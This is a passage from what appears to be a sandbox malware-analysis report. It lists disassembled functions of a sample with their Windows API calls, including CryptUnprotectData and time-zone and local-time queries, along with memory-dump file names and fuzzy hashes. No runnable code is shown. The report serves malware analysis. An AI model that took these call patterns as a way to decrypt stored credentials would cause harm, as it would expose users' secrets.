                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptString
                  • String ID:
                  • API String ID: 80407269-0
                  • Opcode ID: 39bb69c7bbc397994ad1aafd71895466e35c5cd5b44384d44e9f2ec621e2e602
                  • Instruction ID: 80bf59081b8d17a787c4ceb2f882bfcb871693ae446efc73ebb614194d214e82
                  • Opcode Fuzzy Hash: 39bb69c7bbc397994ad1aafd71895466e35c5cd5b44384d44e9f2ec621e2e602
                  • Instruction Fuzzy Hash: 8011D674200309BFDF00DF64D885FAB37A9AF89714F109958F9198B250DB79E941DFA1
                  Function 00929AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                  Download Yara Rule
                  APIs
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00924EEE,00000000,00000000), ref: 00929AEF
                  • LocalAlloc.KERNEL32(00000040,?,?,?,00924EEE,00000000,?), ref: 00929B01
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00924EEE,00000000,00000000), ref: 00929B2A
                  • LocalFree.KERNEL32(?,?,?,?,00924EEE,00000000,?), ref: 00929B3F
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptLocalString$AllocFree
                  • String ID:
                  • API String ID: 4291131564-0
                  • Opcode ID: 4cf49d0f2dfa1925f0e4515c611895390a5de99a06f6ef309a31c2c86b46a27f
                  • Instruction ID: 658c73cf56a563b059231f309f4c0fdce8f91ef006132c394cbf7e7b2cc4816b
                  • Opcode Fuzzy Hash: 4cf49d0f2dfa1925f0e4515c611895390a5de99a06f6ef309a31c2c86b46a27f
                  • Instruction Fuzzy Hash: 4E11A4B4240208AFEB10CF64DC95FAA77B9FB89700F208058F9159B3D4C7B5A901DB90
                  Function 00937980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00940E00,00000000,?), ref: 009379B0
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009379B7
                  • GetLocalTime.KERNEL32(?,?,?,?,?,00940E00,00000000,?), ref: 009379C4
                  • wsprintfA.USER32 ref: 009379F3
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                  • String ID:
                  • API String ID: 377395780-0
                  • Opcode ID: bc88e795b2d6a2e3360ab8652c2fa35aebd207e6b4ce16715515a0ec90cead00
                  • Instruction ID: 0a72bd6f87059165859a2f80ee4ac132ba533e38eb10f3fd2553ed7497f46e9b
                  • Opcode Fuzzy Hash: bc88e795b2d6a2e3360ab8652c2fa35aebd207e6b4ce16715515a0ec90cead00
                  • Instruction Fuzzy Hash: C811E5B2904118AACB149FD9DD45BBEB7F8EB48B11F10465AF605A3280E67D5940CBB1
                  Function 00937A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0105E120,00000000,?,00940E10,00000000,?,00000000,00000000), ref: 00937A63
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00937A6A
                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0105E120,00000000,?,00940E10,00000000,?,00000000,00000000,?), ref: 00937A7D
                  • wsprintfA.USER32 ref: 00937AB7
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                  • String ID:
                  • API String ID: 3317088062-0
                  • Opcode ID: 30ea3a2706d5503f9e132b575568fd20b66b2d295e6c42ee24a7ff96f7667678
                  • Instruction ID: d6e4e4cee07cedebf12a2f9b65477bf913c94cdb4d58d286f9421cb6b5b26417
                  • Opcode Fuzzy Hash: 30ea3a2706d5503f9e132b575568fd20b66b2d295e6c42ee24a7ff96f7667678
                  • Instruction Fuzzy Hash: F5115EB1945218EBEB208B94DC49FA9FB78FB44721F10479AE91AA32C0DB785E40CF51
                  Function 00933720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                  Download Yara Rule
                  APIs
                  • CoCreateInstance.COMBASE(0093E118,00000000,00000001,0093E108,00000000), ref: 00933758
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 009337B0
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharCreateInstanceMultiWide
                  • String ID:
                  • API String ID: 123533781-0
                  • Opcode ID: 8079d0d527583c771c87b00288c82929b4e212e162e1b858fd5951af01c45f40
                  • Instruction ID: 35ae0bdf59a54a81c5c5b65fd114db1b9f6f3f535c3f3715c9062412727f3bd5
                  • Opcode Fuzzy Hash: 8079d0d527583c771c87b00288c82929b4e212e162e1b858fd5951af01c45f40
                  • Instruction Fuzzy Hash: C341C771A40A289FDB24DB58CC95F9BB7B5BB48702F4081D8E609A72D0D7B16E85CF50
                  Function 00929B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00929B84
                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00929BA3
                  • LocalFree.KERNEL32(?), ref: 00929BD3
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$AllocCryptDataFreeUnprotect
                  • String ID:
                  • API String ID: 2068576380-0
                  • Opcode ID: c43d85f0bdbda3e90c9685c53d37569e57d3c9ef86b9af6b272977dd8d650522
                  • Instruction ID: abb01636e3a4dd24a37502e5c636cadbd7101842a8f5b1d379adf9c51d78d84e
                  • Opcode Fuzzy Hash: c43d85f0bdbda3e90c9685c53d37569e57d3c9ef86b9af6b272977dd8d650522
                  • Instruction Fuzzy Hash: 5711CCB4A00209EFCB04DF94D985AAE77F9FF88300F104568E915A7390D774AE10CFA1
                  Function 00C21141 Relevance: 3.9, Strings: 3, Instructions: 169COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 98yW$S}_$Kw
                  • API String ID: 0-2100450784
                  • Opcode ID: c9bd3b2aad855f845c5aa5e1fd8bb37f6d5c88890f364cd16d4da65997788de0
                  • Instruction ID: f4107d8e52e99c8bf7f6c16c008206336cc7aca448cf5489e0ea88f4e1dfa27e
                  • Opcode Fuzzy Hash: c9bd3b2aad855f845c5aa5e1fd8bb37f6d5c88890f364cd16d4da65997788de0
                  • Instruction Fuzzy Hash: 675148F36083004BE3086E2DECA533ABBD6DFD4720F1AC53DE6C587788E97858458646
                  Function 00CE36EA Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: ^V:E$flV
                  • API String ID: 0-96964855
                  • Opcode ID: fe39305e1a1e37a43dc20f3e961d7128260ae664759defd743b80db251878e5c
                  • Instruction ID: 42c7f0ffc3a57493b41bfb9d53c29405e21672528cebe562a295a5fe3b32be02
                  • Opcode Fuzzy Hash: fe39305e1a1e37a43dc20f3e961d7128260ae664759defd743b80db251878e5c
                  • Instruction Fuzzy Hash: E08158F3A0C604AFD3186F2DDC8162AFBE6EBD8720F1A492DE6C4C3754F93559008646
                  Function 00CD57D0 Relevance: 2.7, Strings: 2, Instructions: 242COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 5n$lH=
                  • API String ID: 0-2859898692
                  • Opcode ID: f7849f199b605acb260e738fc3ca1cb61b1c1e7c77634a2805218c67e3789f73
                  • Instruction ID: 0cad71b79b825f24c36c97a8e7797240918c43b68e22631fdf65e366f3a6fd5e
                  • Opcode Fuzzy Hash: f7849f199b605acb260e738fc3ca1cb61b1c1e7c77634a2805218c67e3789f73
                  • Instruction Fuzzy Hash: 5F614AB3A082045FE314AE2DDC8577BBBD6EBD4320F1A4A3DEAC883744E53658058386
                  Function 00C134EB Relevance: 2.7, Strings: 2, Instructions: 240COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 1w}$bMl
                  • API String ID: 0-1890219203
                  • Opcode ID: 5d3d91622d075c746c1e1eedcd7f10b6a457e466c0a10300c72bbb4a49097f26
                  • Instruction ID: f7d4acd4f87416f3f625af74c241009f3982e405dbbfb0c78f05eeda0e2d4ad1
                  • Opcode Fuzzy Hash: 5d3d91622d075c746c1e1eedcd7f10b6a457e466c0a10300c72bbb4a49097f26
                  • Instruction Fuzzy Hash: 61811AF3D082148BE304AE3DDD4577ABBE6DB94720F1A4A3DD9C4C7788E93988458782
                  Function 00CECEE6 Relevance: 2.4, Strings: 1, Instructions: 1144COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: L$}
                  • API String ID: 0-3268990791
                  • Opcode ID: b90d8b9642d08c0b100b5d6c03769e67a25c5f00ea3ae84b792921d0df5687b0
                  • Instruction ID: def1ef54cb822d16de496cda239b1e7d717d6bdf20bbc3d6776734d938ca13cc
                  • Opcode Fuzzy Hash: b90d8b9642d08c0b100b5d6c03769e67a25c5f00ea3ae84b792921d0df5687b0
                  • Instruction Fuzzy Hash: BC72E7F3A082109FE304AE2DDC8577AFBE9EF94720F16853DEAC4C7744E63598058696
                  Function 00BF4665 Relevance: 1.5, Strings: 1, Instructions: 232COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
